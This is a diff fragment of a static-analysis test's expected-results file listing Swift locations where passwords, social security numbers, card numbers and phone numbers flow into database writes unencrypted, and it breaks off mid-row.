-| testCoreData2.swift:84:2:84:2 | dbObj | testCoreData2.swift:84:18:84:18 | bankAccountNo2 | testCoreData2.swift:84:2:84:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:84:18:84:18 | bankAccountNo2 | bankAccountNo2 | -| testCoreData2.swift:85:2:85:2 | dbObj | testCoreData2.swift:85:18:85:18 | bankAccountNo2 | testCoreData2.swift:85:2:85:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:85:18:85:18 | bankAccountNo2 | bankAccountNo2 | -| testCoreData2.swift:87:2:87:10 | ...? | testCoreData2.swift:87:22:87:32 | .bankAccountNo | testCoreData2.swift:87:2:87:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:87:22:87:32 | .bankAccountNo | .bankAccountNo | -| testCoreData2.swift:88:2:88:10 | ...? | testCoreData2.swift:88:22:88:22 | bankAccountNo | testCoreData2.swift:88:2:88:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:88:22:88:22 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:89:2:89:10 | ...? | testCoreData2.swift:89:22:89:22 | bankAccountNo2 | testCoreData2.swift:89:2:89:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:89:22:89:22 | bankAccountNo2 | bankAccountNo2 | -| testCoreData2.swift:93:2:93:2 | dbObj | testCoreData2.swift:91:10:91:10 | bankAccountNo | testCoreData2.swift:93:2:93:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:91:10:91:10 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:98:2:98:2 | dbObj | testCoreData2.swift:95:10:95:10 | bankAccountNo | testCoreData2.swift:98:2:98:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:95:10:95:10 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:104:2:104:2 | dbObj | testCoreData2.swift:101:10:101:10 | bankAccountNo | testCoreData2.swift:104:2:104:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:101:10:101:10 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:105:2:105:2 | dbObj | testCoreData2.swift:101:10:101:10 | bankAccountNo | testCoreData2.swift:105:2:105:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:101:10:101:10 | bankAccountNo | bankAccountNo | -| testCoreData.swift:19:12:19:12 | value | testCoreData.swift:61:25:61:25 | password | testCoreData.swift:19:12:19:12 | value | This operation stores 'value' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:61:25:61:25 | password | password | -| testCoreData.swift:32:13:32:13 | newValue | testCoreData.swift:64:16:64:16 | password | testCoreData.swift:32:13:32:13 | newValue | This operation stores 'newValue' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:64:16:64:16 | password | password | -| testCoreData.swift:48:15:48:15 | password | testCoreData.swift:48:15:48:15 | password | testCoreData.swift:48:15:48:15 | password | This operation stores 'password' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:48:15:48:15 | password | password | -| testCoreData.swift:51:24:51:24 | password | testCoreData.swift:51:24:51:24 | password | testCoreData.swift:51:24:51:24 | password | This operation stores 'password' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:51:24:51:24 | password | password | -| testCoreData.swift:58:15:58:15 | password | testCoreData.swift:58:15:58:15 | password | testCoreData.swift:58:15:58:15 | password | This operation stores 'password' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:58:15:58:15 | password | password | -| testCoreData.swift:64:2:64:2 | obj | testCoreData.swift:64:16:64:16 | password | testCoreData.swift:64:2:64:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:64:16:64:16 | password | password | -| testCoreData.swift:78:15:78:15 | x | testCoreData.swift:77:24:77:24 | x | testCoreData.swift:78:15:78:15 | x | This operation stores 'x' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:77:24:77:24 | x | x | -| testCoreData.swift:81:15:81:15 | y | testCoreData.swift:80:10:80:22 | call to getPassword() | testCoreData.swift:81:15:81:15 | y | This operation stores 'y' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:80:10:80:22 | call to getPassword() | call to getPassword() | -| testCoreData.swift:85:15:85:17 | .password | testCoreData.swift:85:15:85:17 | .password | testCoreData.swift:85:15:85:17 | .password | This operation stores '.password' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:85:15:85:17 | .password | .password | -| testCoreData.swift:95:15:95:15 | x | testCoreData.swift:91:10:91:10 | passwd | testCoreData.swift:95:15:95:15 | x | This operation stores 'x' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:91:10:91:10 | passwd | passwd | -| testCoreData.swift:96:15:96:15 | y | testCoreData.swift:92:10:92:10 | passwd | testCoreData.swift:96:15:96:15 | y | This operation stores 'y' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:92:10:92:10 | passwd | passwd | -| testCoreData.swift:97:15:97:15 | z | testCoreData.swift:93:10:93:10 | passwd | testCoreData.swift:97:15:97:15 | z | This operation stores 'z' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:93:10:93:10 | passwd | passwd | -| testCoreData.swift:128:15:128:33 | call to generateSecretKey() | testCoreData.swift:128:15:128:33 | call to generateSecretKey() | testCoreData.swift:128:15:128:33 | call to generateSecretKey() | This operation stores 'call to generateSecretKey()' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:128:15:128:33 | call to generateSecretKey() | call to generateSecretKey() | -| testCoreData.swift:129:15:129:30 | call to getCertificate() | testCoreData.swift:129:15:129:30 | call to getCertificate() | testCoreData.swift:129:15:129:30 | call to getCertificate() | This operation stores 'call to getCertificate()' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:129:15:129:30 | call to getCertificate() | call to getCertificate() | -| testGRDB.swift:73:56:73:65 | [...] | testGRDB.swift:73:57:73:57 | password | testGRDB.swift:73:56:73:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:73:57:73:57 | password | password | -| testGRDB.swift:76:42:76:51 | [...] | testGRDB.swift:76:43:76:43 | password | testGRDB.swift:76:42:76:51 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:76:43:76:43 | password | password | -| testGRDB.swift:81:44:81:53 | [...] | testGRDB.swift:81:45:81:45 | password | testGRDB.swift:81:44:81:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:81:45:81:45 | password | password | -| testGRDB.swift:83:44:83:53 | [...] | testGRDB.swift:83:45:83:45 | password | testGRDB.swift:83:44:83:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:83:45:83:45 | password | password | -| testGRDB.swift:85:44:85:53 | [...] | testGRDB.swift:85:45:85:45 | password | testGRDB.swift:85:44:85:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:85:45:85:45 | password | password | -| testGRDB.swift:87:44:87:53 | [...] | testGRDB.swift:87:45:87:45 | password | testGRDB.swift:87:44:87:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:87:45:87:45 | password | password | -| testGRDB.swift:92:37:92:46 | [...] | testGRDB.swift:92:38:92:38 | password | testGRDB.swift:92:37:92:46 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:92:38:92:38 | password | password | -| testGRDB.swift:95:36:95:45 | [...] | testGRDB.swift:95:37:95:37 | password | testGRDB.swift:95:36:95:45 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:95:37:95:37 | password | password | -| testGRDB.swift:100:72:100:81 | [...] | testGRDB.swift:100:73:100:73 | password | testGRDB.swift:100:72:100:81 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:100:73:100:73 | password | password | -| testGRDB.swift:101:72:101:81 | [...] | testGRDB.swift:101:73:101:73 | password | testGRDB.swift:101:72:101:81 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:101:73:101:73 | password | password | -| testGRDB.swift:107:52:107:61 | [...] | testGRDB.swift:107:53:107:53 | password | testGRDB.swift:107:52:107:61 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:107:53:107:53 | password | password | -| testGRDB.swift:109:52:109:61 | [...] | testGRDB.swift:109:53:109:53 | password | testGRDB.swift:109:52:109:61 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:109:53:109:53 | password | password | -| testGRDB.swift:111:51:111:60 | [...] | testGRDB.swift:111:52:111:52 | password | testGRDB.swift:111:51:111:60 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:111:52:111:52 | password | password | -| testGRDB.swift:116:47:116:56 | [...] | testGRDB.swift:116:48:116:48 | password | testGRDB.swift:116:47:116:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:116:48:116:48 | password | password | -| testGRDB.swift:118:47:118:56 | [...] | testGRDB.swift:118:48:118:48 | password | testGRDB.swift:118:47:118:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:118:48:118:48 | password | password | -| testGRDB.swift:121:44:121:53 | [...] | testGRDB.swift:121:45:121:45 | password | testGRDB.swift:121:44:121:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:121:45:121:45 | password | password | -| testGRDB.swift:123:44:123:53 | [...] | testGRDB.swift:123:45:123:45 | password | testGRDB.swift:123:44:123:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:123:45:123:45 | password | password | -| testGRDB.swift:126:44:126:53 | [...] | testGRDB.swift:126:45:126:45 | password | testGRDB.swift:126:44:126:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:126:45:126:45 | password | password | -| testGRDB.swift:128:44:128:53 | [...] | testGRDB.swift:128:45:128:45 | password | testGRDB.swift:128:44:128:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:128:45:128:45 | password | password | -| testGRDB.swift:131:44:131:53 | [...] | testGRDB.swift:131:45:131:45 | password | testGRDB.swift:131:44:131:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:131:45:131:45 | password | password | -| testGRDB.swift:133:44:133:53 | [...] | testGRDB.swift:133:45:133:45 | password | testGRDB.swift:133:44:133:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:133:45:133:45 | password | password | -| testGRDB.swift:138:68:138:77 | [...] | testGRDB.swift:138:69:138:69 | password | testGRDB.swift:138:68:138:77 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:138:69:138:69 | password | password | -| testGRDB.swift:140:68:140:77 | [...] | testGRDB.swift:140:69:140:69 | password | testGRDB.swift:140:68:140:77 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:140:69:140:69 | password | password | -| testGRDB.swift:143:65:143:74 | [...] | testGRDB.swift:143:66:143:66 | password | testGRDB.swift:143:65:143:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:143:66:143:66 | password | password | -| testGRDB.swift:145:65:145:74 | [...] | testGRDB.swift:145:66:145:66 | password | testGRDB.swift:145:65:145:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:145:66:145:66 | password | password | -| testGRDB.swift:148:65:148:74 | [...] | testGRDB.swift:148:66:148:66 | password | testGRDB.swift:148:65:148:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:148:66:148:66 | password | password | -| testGRDB.swift:150:65:150:74 | [...] | testGRDB.swift:150:66:150:66 | password | testGRDB.swift:150:65:150:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:150:66:150:66 | password | password | -| testGRDB.swift:153:65:153:74 | [...] | testGRDB.swift:153:66:153:66 | password | testGRDB.swift:153:65:153:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:153:66:153:66 | password | password | -| testGRDB.swift:155:65:155:74 | [...] | testGRDB.swift:155:66:155:66 | password | testGRDB.swift:155:65:155:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:155:66:155:66 | password | password | -| testGRDB.swift:160:59:160:68 | [...] | testGRDB.swift:160:60:160:60 | password | testGRDB.swift:160:59:160:68 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:160:60:160:60 | password | password | -| testGRDB.swift:161:50:161:59 | [...] | testGRDB.swift:161:51:161:51 | password | testGRDB.swift:161:50:161:59 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:161:51:161:51 | password | password | -| testGRDB.swift:164:59:164:68 | [...] | testGRDB.swift:164:60:164:60 | password | testGRDB.swift:164:59:164:68 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:164:60:164:60 | password | password | -| testGRDB.swift:165:50:165:59 | [...] | testGRDB.swift:165:51:165:51 | password | testGRDB.swift:165:50:165:59 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:165:51:165:51 | password | password | -| testGRDB.swift:169:56:169:65 | [...] | testGRDB.swift:169:57:169:57 | password | testGRDB.swift:169:56:169:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:169:57:169:57 | password | password | -| testGRDB.swift:170:47:170:56 | [...] | testGRDB.swift:170:48:170:48 | password | testGRDB.swift:170:47:170:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:170:48:170:48 | password | password | -| testGRDB.swift:173:56:173:65 | [...] | testGRDB.swift:173:57:173:57 | password | testGRDB.swift:173:56:173:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:173:57:173:57 | password | password | -| testGRDB.swift:174:47:174:56 | [...] | testGRDB.swift:174:48:174:48 | password | testGRDB.swift:174:47:174:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:174:48:174:48 | password | password | -| testGRDB.swift:178:56:178:65 | [...] | testGRDB.swift:178:57:178:57 | password | testGRDB.swift:178:56:178:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:178:57:178:57 | password | password | -| testGRDB.swift:179:47:179:56 | [...] | testGRDB.swift:179:48:179:48 | password | testGRDB.swift:179:47:179:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:179:48:179:48 | password | password | -| testGRDB.swift:182:56:182:65 | [...] | testGRDB.swift:182:57:182:57 | password | testGRDB.swift:182:56:182:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:182:57:182:57 | password | password | -| testGRDB.swift:183:47:183:56 | [...] | testGRDB.swift:183:48:183:48 | password | testGRDB.swift:183:47:183:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:183:48:183:48 | password | password | -| testGRDB.swift:187:56:187:65 | [...] | testGRDB.swift:187:57:187:57 | password | testGRDB.swift:187:56:187:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:187:57:187:57 | password | password | -| testGRDB.swift:188:47:188:56 | [...] | testGRDB.swift:188:48:188:48 | password | testGRDB.swift:188:47:188:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:188:48:188:48 | password | password | -| testGRDB.swift:191:56:191:65 | [...] | testGRDB.swift:191:57:191:57 | password | testGRDB.swift:191:56:191:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:191:57:191:57 | password | password | -| testGRDB.swift:192:47:192:56 | [...] | testGRDB.swift:192:48:192:48 | password | testGRDB.swift:192:47:192:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:192:48:192:48 | password | password | -| testGRDB.swift:198:29:198:38 | [...] | testGRDB.swift:198:30:198:30 | password | testGRDB.swift:198:29:198:38 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:198:30:198:30 | password | password | -| testGRDB.swift:201:23:201:32 | [...] | testGRDB.swift:201:24:201:24 | password | testGRDB.swift:201:23:201:32 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:201:24:201:24 | password | password | -| testGRDB.swift:206:66:206:75 | [...] | testGRDB.swift:206:67:206:67 | password | testGRDB.swift:206:66:206:75 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:206:67:206:67 | password | password | -| testGRDB.swift:208:80:208:89 | [...] | testGRDB.swift:208:81:208:81 | password | testGRDB.swift:208:80:208:89 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:208:81:208:81 | password | password | -| testGRDB.swift:210:84:210:93 | [...] | testGRDB.swift:210:85:210:85 | password | testGRDB.swift:210:84:210:93 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:210:85:210:85 | password | password | -| testGRDB.swift:212:98:212:107 | [...] | testGRDB.swift:212:99:212:99 | password | testGRDB.swift:212:98:212:107 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:212:99:212:99 | password | password | -| testRealm2.swift:18:2:18:2 | o | testRealm2.swift:18:11:18:11 | myPassword | testRealm2.swift:18:2:18:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:18:11:18:11 | myPassword | myPassword | -| testRealm2.swift:24:2:24:2 | o | testRealm2.swift:24:11:24:11 | socialSecurityNumber | testRealm2.swift:24:2:24:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:24:11:24:11 | socialSecurityNumber | socialSecurityNumber | -| testRealm2.swift:25:2:25:2 | o | testRealm2.swift:25:11:25:11 | ssn | testRealm2.swift:25:2:25:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:25:11:25:11 | ssn | ssn | -| testRealm2.swift:26:2:26:2 | o | testRealm2.swift:26:18:26:18 | ssn_int | testRealm2.swift:26:2:26:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:26:18:26:18 | ssn_int | ssn_int | -| testRealm2.swift:32:2:32:2 | o | testRealm2.swift:32:11:32:11 | creditCardNumber | testRealm2.swift:32:2:32:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:32:11:32:11 | creditCardNumber | creditCardNumber | -| testRealm2.swift:33:2:33:2 | o | testRealm2.swift:33:11:33:11 | CCN | testRealm2.swift:33:2:33:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:33:11:33:11 | CCN | CCN | -| testRealm2.swift:34:2:34:2 | o | testRealm2.swift:34:18:34:18 | int_ccn | testRealm2.swift:34:2:34:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:34:18:34:18 | int_ccn | int_ccn | -| testRealm.swift:41:2:41:2 | a | testRealm.swift:41:11:41:11 | myPassword | testRealm.swift:41:2:41:2 | [post] a | This operation stores 'a' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:41:11:41:11 | myPassword | myPassword | -| testRealm.swift:49:2:49:2 | c | testRealm.swift:49:11:49:11 | myPassword | testRealm.swift:49:2:49:2 | [post] c | This operation stores 'c' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:49:11:49:11 | myPassword | myPassword | -| testRealm.swift:59:2:59:3 | ...! | testRealm.swift:59:12:59:12 | myPassword | testRealm.swift:59:2:59:3 | [post] ...! | This operation stores '...!' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:59:12:59:12 | myPassword | myPassword | -| testRealm.swift:66:2:66:2 | g | testRealm.swift:66:11:66:11 | myPassword | testRealm.swift:66:2:66:2 | [post] g | This operation stores 'g' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:66:11:66:11 | myPassword | myPassword | -| testRealm.swift:73:2:73:2 | h | testRealm.swift:73:15:73:15 | myPassword | testRealm.swift:73:2:73:2 | [post] h | This operation stores 'h' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:73:15:73:15 | myPassword | myPassword | edges | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:123:17:123:17 | insertQuery | provenance | | | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:127:21:127:21 | insertQuery | provenance | | @@ -762,3 +622,143 @@ subpaths | testRealm.swift:59:12:59:12 | myPassword | testRealm.swift:27:6:27:6 | value | testRealm.swift:27:6:27:6 | self [Return] [data] | testRealm.swift:59:2:59:3 | [post] ...! | | testRealm.swift:66:11:66:11 | myPassword | testRealm.swift:27:6:27:6 | value | testRealm.swift:27:6:27:6 | self [Return] [data] | testRealm.swift:66:2:66:2 | [post] g | | testRealm.swift:73:15:73:15 | myPassword | testRealm.swift:34:6:34:6 | value | testRealm.swift:34:6:34:6 | self [Return] [password] | testRealm.swift:73:2:73:2 | [post] h | +#select +| SQLite.swift:123:17:123:17 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:123:17:123:17 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:124:17:124:17 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:124:17:124:17 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:127:21:127:21 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:127:21:127:21 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:128:21:128:21 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:128:21:128:21 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:131:17:131:17 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:131:17:131:17 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:132:17:132:17 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:132:17:132:17 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:135:20:135:20 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:135:20:135:20 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:136:20:136:20 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:136:20:136:20 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:139:24:139:24 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:139:24:139:24 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:140:24:140:24 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:140:24:140:24 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:147:32:147:32 | [...] | SQLite.swift:147:32:147:32 | mobilePhoneNumber | SQLite.swift:147:32:147:32 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:147:32:147:32 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:148:28:148:28 | [...] | SQLite.swift:148:28:148:28 | mobilePhoneNumber | SQLite.swift:148:28:148:28 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:148:28:148:28 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:149:31:149:31 | [...] | SQLite.swift:149:31:149:31 | mobilePhoneNumber | SQLite.swift:149:31:149:31 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:149:31:149:31 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:152:21:152:21 | [...] | SQLite.swift:152:21:152:21 | mobilePhoneNumber | SQLite.swift:152:21:152:21 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:152:21:152:21 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:153:20:153:20 | [...] | SQLite.swift:153:20:153:20 | mobilePhoneNumber | SQLite.swift:153:20:153:20 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:153:20:153:20 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:154:23:154:23 | [...] | SQLite.swift:154:23:154:23 | mobilePhoneNumber | SQLite.swift:154:23:154:23 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:154:23:154:23 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:158:32:158:54 | [...] | SQLite.swift:158:33:158:33 | mobilePhoneNumber | SQLite.swift:158:32:158:54 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:158:33:158:33 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:159:28:159:50 | [...] | SQLite.swift:159:29:159:29 | mobilePhoneNumber | SQLite.swift:159:28:159:50 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:159:29:159:29 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:160:31:160:53 | [...] | SQLite.swift:160:32:160:32 | mobilePhoneNumber | SQLite.swift:160:31:160:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:160:32:160:32 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:163:21:163:43 | [...] | SQLite.swift:163:22:163:22 | mobilePhoneNumber | SQLite.swift:163:21:163:43 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:163:22:163:22 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:164:20:164:42 | [...] | SQLite.swift:164:21:164:21 | mobilePhoneNumber | SQLite.swift:164:20:164:42 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:164:21:164:21 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:165:23:165:45 | [...] | SQLite.swift:165:24:165:24 | mobilePhoneNumber | SQLite.swift:165:23:165:45 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:165:24:165:24 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:169:32:169:70 | [...] | SQLite.swift:169:53:169:53 | mobilePhoneNumber | SQLite.swift:169:32:169:70 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:169:53:169:53 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:170:28:170:66 | [...] | SQLite.swift:170:49:170:49 | mobilePhoneNumber | SQLite.swift:170:28:170:66 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:170:49:170:49 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:171:31:171:69 | [...] | SQLite.swift:171:52:171:52 | mobilePhoneNumber | SQLite.swift:171:31:171:69 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:171:52:171:52 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:174:21:174:59 | [...] | SQLite.swift:174:42:174:42 | mobilePhoneNumber | SQLite.swift:174:21:174:59 | [...] | This 